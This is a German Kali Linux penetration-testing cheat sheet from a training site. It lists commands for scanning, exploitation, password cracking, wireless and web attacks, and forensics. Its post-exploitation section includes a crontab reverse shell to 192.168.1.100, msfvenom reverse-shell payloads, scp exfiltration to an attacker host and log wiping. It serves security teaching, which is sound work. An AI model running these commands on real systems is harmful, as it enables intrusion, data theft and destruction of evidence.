Kali Linux Spickzettel

Lernen Sie Kali Linux mit praktischen Labs

Lernen Sie Kali Linux Penetration Testing durch praktische Labs und reale Szenarien. LabEx bietet umfassende Kali Linux Kurse, die wesentliche Befehle, Netzwerksuche, Schwachstellenbewertung, Passwortangriffe, Webanwendungstests und digitale Forensik abdecken. Meistern Sie ethische Hacking-Techniken und Sicherheitsauditing-Tools.

System-Setup & Konfiguration

Ersteinrichtung: sudo apt update

Aktualisieren Sie Systempakete und Repositorys für optimale Leistung.

# Paket-Repository aktualisieren
sudo apt update
# Installierte Pakete aktualisieren
sudo apt upgrade
# Vollständiges System-Upgrade
sudo apt full-upgrade
# Wesentliche Tools installieren
sudo apt install curl wget git

Benutzerverwaltung: sudo useradd

Erstellen und verwalten Sie Benutzerkonten für Sicherheitstests.

# Neuen Benutzer hinzufügen
sudo useradd -m benutzername
# Passwort festlegen
sudo passwd benutzername
# Benutzer zur sudo-Gruppe hinzufügen
sudo usermod -aG sudo benutzername
# Benutzer wechseln
su - benutzername

Dienstverwaltung: systemctl

Steuern Sie Systemdienste und Daemons für Test-Szenarien.

# Dienst starten
sudo systemctl start apache2
# Dienst stoppen
sudo systemctl stop apache2
# Dienst beim Booten aktivieren
sudo systemctl enable ssh
# Dienststatus prüfen
sudo systemctl status postgresql

Netzwerkkonfiguration: ifconfig

Konfigurieren Sie Netzwerkschnittstellen für Penetrationstests.

# Netzwerkschnittstellen anzeigen
ifconfig
# IP-Adresse konfigurieren
sudo ifconfig eth0 192.168.1.100
# Schnittstelle hoch/runter setzen
sudo ifconfig eth0 up
# Drahtlose Schnittstelle konfigurieren
sudo ifconfig wlan0 up

Umgebungsvariablen: export

Richten Sie Testumgebungsvariablen und Pfade ein.

# Ziel-IP festlegen
export TARGET=192.168.1.1
# Wordlist-Pfad festlegen
export WORDLIST=/usr/share/wordlists/rockyou.txt
# Umgebungsvariablen anzeigen
env | grep TARGET
Quiz

Melden Sie sich an, um dieses Quiz zu beantworten und Ihren Lernfortschritt zu verfolgen

Was passiert mit Umgebungsvariablen, die mit export gesetzt werden?
Sie bleiben über Systemneustarts hinaus bestehen
Sie sind nur in der aktuellen Datei verfügbar
Sie sind für die aktuelle Shell und Kindprozesse verfügbar
Sie sind globale Systemvariablen

Tool-Installation: apt install

Installieren Sie zusätzliche Sicherheitstools und Abhängigkeiten.

# Zusätzliche Tools installieren
sudo apt install nmap wireshark burpsuite
# Von GitHub installieren
git clone https://github.com/tool/repo.git
# Python-Tools installieren
pip3 install --user tool-name

Netzwerkerkennung & Scanning

Host-Erkennung: nmap -sn

Identifizieren Sie aktive Hosts im Netzwerk mithilfe von Ping-Sweeps.

# Ping-Sweep
nmap -sn 192.168.1.0/24
# ARP-Scan (lokales Netzwerk)
nmap -PR 192.168.1.0/24
# ICMP-Echo-Scan
nmap -PE 192.168.1.0/24
# Schnelle Host-Erkennung
masscan --ping 192.168.1.0/24

Port-Scanning: nmap

Scannen Sie nach offenen Ports und laufenden Diensten auf Zielsystemen.

# Basis-TCP-Scan
nmap 192.168.1.1
# Aggressiver Scan
nmap -A 192.168.1.1
# UDP-Scan
nmap -sU 192.168.1.1
# Stealth-SYN-Scan
nmap -sS 192.168.1.1
Quiz

Melden Sie sich an, um dieses Quiz zu beantworten und Ihren Lernfortschritt zu verfolgen

Was bewirkt nmap -sS?
Führt einen UDP-Scan durch
Führt einen Stealth-SYN-Scan durch (Halb-offener Scan)
Scannt alle Ports
Führt eine Betriebssystemerkennung durch

Dienst-Enumeration: nmap -sV

Identifizieren Sie Dienstversionen und potenzielle Schwachstellen.

# Versionserkennung
nmap -sV 192.168.1.1
# OS-Erkennung
nmap -O 192.168.1.1
Quiz

Melden Sie sich an, um dieses Quiz zu beantworten und Ihren Lernfortschritt zu verfolgen

Was bewirkt nmap -sV?
Erkennt laufende Dienstversionen auf offenen Ports
Scannt nur Versionskontroll-Ports
Zeigt nur anfällige Dienste an
Führt nur die Betriebssystemerkennung durch
# Skript-Scanning nmap -sC 192.168.1.1 # Umfassender Scan nmap -sS -sV -O -A 192.168.1.1 ```

Informationsbeschaffung & Aufklärung

DNS-Enumeration: dig

Sammeln Sie DNS-Informationen und führen Sie Zonentransfers durch.

# Basis-DNS-Abfrage
dig example.com
# Reverse-DNS-Abfrage
dig -x 192.168.1.1
# Zonentransfer-Versuch
dig @ns1.example.com example.com axfr
# DNS-Enumeration
dnsrecon -d example.com

Web-Aufklärung: dirb

Entdecken Sie versteckte Verzeichnisse und Dateien auf Webservern.

# Verzeichnis-Brute-Force
dirb http://192.168.1.1
# Benutzerdefinierte Wordlist
dirb http://192.168.1.1 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Gobuster Alternative
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

WHOIS-Informationen: whois

Sammeln Sie Informationen zur Domain-Registrierung und zum Eigentümer.

# WHOIS-Abfrage
whois example.com
# IP WHOIS
whois 8.8.8.8
# Umfassende Informationsbeschaffung
theharvester -d example.com -l 100 -b google

SSL/TLS-Analyse: sslscan

Analysieren Sie SSL/TLS-Konfigurationen und Schwachstellen.

# SSL-Scan
sslscan 192.168.1.1:443
# Testssl umfassende Analyse
testssl.sh https://example.com
# SSL-Zertifikatsinformationen
openssl s_client -connect example.com:443

SMB-Enumeration: enum4linux

Enumerieren Sie SMB-Freigaben und NetBIOS-Informationen.

# SMB-Enumeration
enum4linux 192.168.1.1
# SMB-Freigaben auflisten
smbclient -L //192.168.1.1
# Mit Freigabe verbinden
smbclient //192.168.1.1/share
# SMB-Schwachstellenscan
nmap --script smb-vuln* 192.168.1.1

SNMP-Enumeration: snmpwalk

Sammeln Sie Systeminformationen über das SNMP-Protokoll.

# SNMP-Walk
snmpwalk -c public -v1 192.168.1.1
# SNMP-Prüfung
onesixtyone -c community.txt 192.168.1.1
# SNMP-Enumeration
snmp-check 192.168.1.1

Schwachstellenanalyse & Ausnutzung

Schwachstellen-Scanning: nessus

Identifizieren Sie Sicherheitslücken mithilfe automatisierter Scanner.

# Nessus-Dienst starten
sudo systemctl start nessusd
# OpenVAS-Scan starten
openvas-start
# Nikto Web-Schwachstellenscanner
nikto -h http://192.168.1.1
# SQLmap für SQL-Injection
sqlmap -u "http://example.com/page.php?id=1"

Metasploit Framework: msfconsole

Starten Sie Exploits und verwalten Sie Penetrationstest-Kampagnen.

# Metasploit starten
msfconsole
# Exploits suchen
search ms17-010
# Exploit verwenden
use exploit/windows/smb/ms17_010_eternalblue
# Ziel festlegen
set RHOSTS 192.168.1.1

Buffer Overflow-Tests: pattern_create

Generieren Sie Muster für Buffer Overflow-Ausnutzungen.

# Muster erstellen
pattern_create.rb -l 400
# Offset finden
pattern_offset.rb -l 400 -q EIP_value

Benutzerdefinierte Exploit-Entwicklung: msfvenom

Erstellen Sie benutzerdefinierte Payloads für bestimmte Ziele.

# Shellcode generieren
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c
# Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe
# Linux Reverse Shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf > shell.elf

Passwortangriffe & Anmeldeinformationstests

Brute-Force-Angriffe: hydra

Führen Sie Login-Brute-Force-Angriffe gegen verschiedene Dienste durch.

# SSH-Brute-Force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# HTTP-Formular-Brute-Force
hydra -l admin -P passwords.txt 192.168.1.1 http-form-post "/login:username=^USER^&password=^PASS^:Invalid"
# FTP-Brute-Force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1

Hash-Knacken: hashcat

Knacken Sie Passwort-Hashes mithilfe von GPU-Beschleunigung.

# MD5-Hash-Knacken
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# NTLM-Hash-Knacken
hashcat -m 1000 -a 0 ntlm.hash wordlist.txt
# Wordlist-Variationen generieren
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt

John the Ripper: john

Traditionelles Passwort-Knacken mit verschiedenen Angriffsmodi.

# Passwortdatei knacken
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# Geknackte Passwörter anzeigen
john --show shadow.txt
# Inkrementeller Modus
john --incremental shadow.txt
# Benutzerdefinierte Regeln
john --rules --wordlist=passwords.txt shadow.txt

Wordlist-Generierung: crunch

Erstellen Sie benutzerdefinierte Wordlists für gezielte Angriffe.

# 4-8 Zeichen lange Wordlist generieren
crunch 4 8 -o wordlist.txt
# Benutzerdefiniertes Zeichensatzmuster
crunch 6 6 -t admin@ -o passwords.txt
# Musterbasierte Generierung
crunch 8 8 -t @@@@%%%% -o mixed.txt

Tests zur Sicherheit drahtloser Netzwerke

Monitor-Modus-Setup: airmon-ng

Konfigurieren Sie den WLAN-Adapter für Paketaufnahme und -injektion.

# Monitor-Modus aktivieren
sudo airmon-ng start wlan0
# Störende Prozesse prüfen
sudo airmon-ng check kill
# Monitor-Modus beenden
sudo airmon-ng stop wlan0mon

Netzwerkerkennung: airodump-ng

Entdecken und überwachen Sie drahtlose Netzwerke und Clients.

# Alle Netzwerke scannen
sudo airodump-ng wlan0mon
# Auf spezifisches Netzwerk abzielen
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Nur WEP-Netzwerke anzeigen
sudo airodump-ng --encrypt WEP wlan0mon

WPA/WPA2-Angriffe: aircrack-ng

Führen Sie Angriffe gegen WPA/WPA2-verschlüsselte Netzwerke durch.

# Deauth-Angriff
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Erfassten Handshake knacken
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# WPS-Angriff mit Reaver
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Evil Twin-Angriff: hostapd

Erstellen Sie betrügerische Zugangspunkte zur Ernte von Anmeldeinformationen.

# Rogue AP starten
sudo hostapd hostapd.conf
# DHCP-Dienst
sudo dnsmasq -C dnsmasq.conf
# Anmeldeinformationen erfassen
ettercap -T -M arp:remote /192.168.1.0/24//

Tests zur Sicherheit von Webanwendungen

SQL-Injection-Tests: sqlmap

Automatisierte Erkennung und Ausnutzung von SQL-Injection.

# Basis-SQL-Injection-Test
sqlmap -u "http://example.com/page.php?id=1"
# POST-Parameter testen
sqlmap -u "http://example.com/login.php" --data="username=admin&password=test"
# Datenbank extrahieren
sqlmap -u "http://example.com/page.php?id=1" --dbs
# Spezifische Tabelle dumpen
sqlmap -u "http://example.com/page.php?id=1" -D database -T users --dump

Cross-Site Scripting: xsser

Testen Sie Webanwendungen auf XSS-Schwachstellen.

# XSS-Test
xsser --url "http://example.com/search.php?q=XSS"
# Automatisierte XSS-Erkennung
xsser -u "http://example.com" --crawl=10
# Benutzerdefiniertes Payload
xsser --url "http://example.com" --payload="<script>alert(1)</script>"

Burp Suite-Integration: burpsuite

Umfassende Testplattform für die Sicherheit von Webanwendungen.

# Burp Suite starten
burpsuite
# Proxy konfigurieren (127.0.0.1:8080)
# Browser-Proxy einstellen, um den Verkehr zu erfassen
# Intruder für automatisierte Angriffe verwenden
# Spider zur Inhaltserkennung

Directory Traversal: wfuzz

Testen Sie auf Schwachstellen bei Verzeichniskreuzungen und Dateieinbindung.

# Verzeichnis-Fuzzing
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://192.168.1.1/FUZZ
# Parameter-Fuzzing
wfuzz -c -z file,payloads.txt "http://example.com/page.php?file=FUZZ"

Post-Exploitation & Rechteausweitung

System-Enumeration: linpeas

Automatisierte Enumeration zur Rechteausweitung für Linux-Systeme.

# LinPEAS herunterladen
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# Ausführbar machen
chmod +x linpeas.sh
# Enumeration ausführen
./linpeas.sh
# Windows Alternative: winPEAS.exe

Persistenzmechanismen: crontab

Stellen Sie Persistenz auf kompromittierten Systemen her.

# Crontab bearbeiten
crontab -e
# Reverse Shell hinzufügen
@reboot /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'
# SSH-Schlüssel-Persistenz
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

Datendiebstahl: scp

Übertragen Sie Daten sicher von kompromittierten Systemen.

# Datei auf Angreifer-Maschine kopieren
scp file.txt user@192.168.1.100:/tmp/
# Komprimieren und übertragen
tar -czf data.tar.gz /home/user/documents
scp data.tar.gz attacker@192.168.1.100:/tmp/
# HTTP-Diebstahl
python3 -m http.server 8000

Spuren verwischen: history

Entfernen Sie Beweise von Aktivitäten auf kompromittierten Systemen.

# Bash-Verlauf löschen
history -c
unset HISTFILE
# Spezifische Einträge löschen
history -d Zeilennummer
# Systemprotokolle löschen
sudo rm /var/log/auth.log*

Digitale Forensik & Analyse

Festplatten-Imaging: dd

Erstellen Sie forensische Abbilder von Speichergeräten.

# Festplattenabbild erstellen
sudo dd if=/dev/sdb of=/tmp/evidence.img bs=4096 conv=noerror,sync
# Bildintegrität überprüfen
md5sum /dev/sdb > original.md5
md5sum /tmp/evidence.img > image.md5
# Abbild einbinden
sudo mkdir /mnt/evidence
sudo mount -o ro,loop /tmp/evidence.img /mnt/evidence

Dateiwiederherstellung: foremost

Stellen Sie gelöschte Dateien aus Festplattenabbildern oder Laufwerken wieder her.

# Dateien aus Abbild wiederherstellen
foremost -i evidence.img -o recovered/
# Spezifische Dateitypen
foremost -t jpg,png,pdf -i evidence.img -o photos/
# PhotoRec Alternative
photorec evidence.img

Speicheranalyse: volatility

Analysieren Sie RAM-Dumps auf forensische Beweise.

# OS-Profil identifizieren
volatility -f memory.dump imageinfo
# Prozesse auflisten
volatility -f memory.dump --profile=Win7SP1x64 pslist
# Prozess extrahieren
volatility -f memory.dump --profile=Win7SP1x64 procdump -p 1234 -D output/

Netzwerkanalysator: wireshark

Analysieren Sie Netzwerkverkehrsaufzeichnungen auf forensische Beweise.

# Wireshark starten
wireshark
# Befehlszeilenanalyse
tshark -r capture.pcap -Y "http.request.method==GET"
# Dateien extrahieren
foremost -i capture.pcap -o extracted/

Berichterstellung & Dokumentation

Screenshot-Erfassung: gnome-screenshot

Dokumentieren Sie Ergebnisse mit systematischer Erfassung von Screenshots.

# Vollbildaufnahme
gnome-screenshot -f screenshot.png
# Fensteraufnahme
gnome-screenshot -w -f window.png
# Verzögerte Aufnahme
gnome-screenshot -d 5 -f delayed.png
# Bereichsauswahl
gnome-screenshot -a -f area.png

Protokollverwaltung: script

Zeichnen Sie Terminal-Sitzungen zu Dokumentationszwecken auf.

# Aufnahme der Sitzung starten
script session.log
# Mit Zeitstempel aufzeichnen
script -T session.time session.log
# Sitzung wiedergeben
scriptreplay session.time session.log

Berichtsvorlagen: reportlab

Erstellen Sie professionelle Penetrationstest-Berichte.

# Berichtstools installieren
pip3 install reportlab
# PDF-Bericht generieren
python3 generate_report.py
# Markdown zu PDF
pandoc report.md -o report.pdf

Beweisintegrität: sha256sum

Wahren Sie die Beweiskette mit kryptografischen Hashes.

# Prüfsummen generieren
sha256sum evidence.img > evidence.sha256
# Integrität überprüfen
sha256sum -c evidence.sha256
# Mehrere Datei-Prüfsummen
find /evidence -type f -exec sha256sum {} \; > all_files.sha256

Systemwartung & Optimierung

Paketverwaltung: apt

Verwalten und aktualisieren Sie Systempakete und Sicherheitstools.

# Paketlisten aktualisieren
sudo apt update
# Alle Pakete aktualisieren
sudo apt upgrade
# Spezifisches Tool installieren
sudo apt install tool-name
# Unbenutzte Pakete entfernen
sudo apt autoremove

Kernel-Updates: uname

Überwachen und aktualisieren Sie den Systemkernel auf Sicherheitspatches.

# Aktuellen Kernel prüfen
uname -r
# Verfügbare Kernel auflisten
apt list --upgradable | grep linux-image
# Neuen Kernel installieren
sudo apt install linux-image-generic
# Alte Kernel entfernen
sudo apt autoremove --purge

Tool-Überprüfung: which

Überprüfen Sie Tool-Installationen und lokalisieren Sie ausführbare Dateien.

# Tool lokalisieren
which nmap
# Prüfen, ob Tool existiert
command -v metasploit
# Alle Tools im Verzeichnis auflisten
ls /usr/bin/ | grep -i security

Ressourcenüberwachung: htop

Überwachen Sie Systemressourcen während intensiver Sicherheitstests.

# Interaktiver Prozess-Viewer
htop
# Speichernutzung
free -h
# Festplattennutzung
df -h
# Netzwerkverbindungen
netstat -tulnp

Wesentliche Kali Linux Verknüpfungen & Aliase

Aliase erstellen: .bashrc

Richten Sie zeitsparende Befehlskürzel für häufige Aufgaben ein.

# Bashrc bearbeiten
nano ~/.bashrc
# Nützliche Aliase hinzufügen
alias ll='ls -la'
alias nse='nmap --script-help'
alias target='export TARGET='
alias msf='msfconsole -q'
# Bashrc neu laden
source ~/.bashrc

Benutzerdefinierte Funktionen: function

Erstellen Sie erweiterte Befehlskombinationen für gängige Workflows.

# Schneller nmap-Scan-Funktion
function qscan() {
    nmap -sS -sV -O $1
}
# Setup für Engagements
function pentest-setup() {
    mkdir -p {recon,scans,exploits,loot}
}

Tastenkombinationen: Terminal

Meistern Sie wesentliche Tastenkombinationen für schnellere Navigation.

# Terminal-Verknüpfungen
# Ctrl+C - Aktuellen Befehl beenden
# Ctrl+Z - Aktuellen Befehl suspendieren
# Ctrl+L - Bildschirm löschen
# Ctrl+R - Befehlshistorie durchsuchen
# Tab - Befehle automatisch vervollständigen
# Pfeil nach oben/unten - Befehlshistorie durchsuchen

Umgebungskonfiguration: tmux

Richten Sie persistente Terminal-Sitzungen für lang laufende Aufgaben ein.

# Neue Sitzung starten
tmux new-session -s pentest
# Sitzung trennen
# Ctrl+B, D
# Sitzungen auflisten
tmux list-sessions
# Mit Sitzung verbinden
tmux attach -t pentest